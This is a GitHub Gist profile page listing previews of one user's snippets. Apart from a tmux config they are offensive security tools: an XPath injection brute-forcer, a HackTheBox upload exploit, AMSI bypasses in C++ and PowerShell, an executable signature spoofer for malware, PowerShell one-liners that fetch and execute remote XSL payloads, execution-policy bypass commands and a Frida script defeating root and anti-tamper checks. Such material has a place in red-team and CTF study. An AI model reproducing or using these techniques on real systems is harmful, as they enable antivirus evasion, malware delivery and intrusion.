Skip to content

Instantly share code, notes, and snippets.

@sharpicx
sharpicx / .tmux.conf
Last active October 20, 2024 16:52
macbook .tmux.conf
set -g default-terminal "screen-256color"
setw -g xterm-keys on
set -s escape-time 10
set -sg repeat-time 600
set -s focus-events on
unbind C-b
set -g prefix C-a
set-option -g repeat-time 0
@sharpicx
sharpicx / xpath.py
Created September 25, 2024 17:27
xpath
import requests
import string
import time
from requests.exceptions import ConnectionError
from pwn import log
ext = ""
i = 1
while True:
try:
@sharpicx
sharpicx / a.py
Created September 4, 2024 07:04
GreenHorn
import requests
import readline
from requests_toolbelt.multipart.encoder import MultipartEncoder
def print_colored(text, color_code):
print(f"\033[{color_code}m{text}\033[0m")
def upload():
login_url = "http://greenhorn.htb/login.php"
upload_url = "http://greenhorn.htb/admin.php?action=installmodule"
@sharpicx
sharpicx / AmsiContextHook.cpp
Created August 7, 2024 18:11 — forked from rxwx/AmsiContextHook.cpp
Bypass AMSI on Windows 11 by hooking the AMSI context VTable on the heap with a ROP gadget. Look ma, no code patches!
#include <Windows.h>
#include <Psapi.h>
#include <metahost.h>
#include <comutil.h>
#include <mscoree.h>
#include "patch_info.h"
#include "base\helpers.h"
/**
* For the debug build we want:
@sharpicx
sharpicx / signing.py
Created August 4, 2024 09:27
.exe Malware Signer Spoofer
import random
import sys
from OpenSSL import crypto
from pathlib import Path
from ssl import get_server_certificate
from subprocess import call, PIPE
from os import system
from random import randrange, randint, uniform, shuffle, SystemRandom
from string import ascii_letters
@sharpicx
sharpicx / amcrot.ps1
Created August 3, 2024 02:16
amsi bypass
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
Equals('System.dll')
}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -like "Ge*P*oc*ddress") {$tmp+=$_}}
return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
@($moduleName)), $functionName))
@sharpicx
sharpicx / amsi-bypass.md
Created July 14, 2024 19:44 — forked from D3Ext/amsi-bypass.md
All methods to bypass AMSI (2022)

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

@sharpicx
sharpicx / PowerShell.txt
Created July 14, 2024 18:37 — forked from S3cur3Th1sSh1t/PowerShell.txt
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
@sharpicx
sharpicx / PowershellBypass.ps1
Created July 14, 2024 18:13 — forked from adithyan-ak/PowershellBypass.ps1
Bypass the PowerShell Execution Policy Restrictions
https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/
powershell.exe -ExecutionPolicy Bypass
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
Set-ExecutionPolicy Bypass -Scope Process
@sharpicx
sharpicx / script.js
Created July 6, 2024 12:47
challenge android
Java.perform(() => {
let RootDetector = Java.use("***.*****.**********.RootDetector");
RootDetector["isRooted"].implementation = function () {
return false; // only for boolean function calling
};
let EmulatorDetector = Java.use("***.*****.*********.EmulatorDetector");
EmulatorDetector["isEmulator"].implementation = function () {
return false; // only for boolean function calling
};
let AntiFrida = Java.use("***.*****.*********.AntiFrida");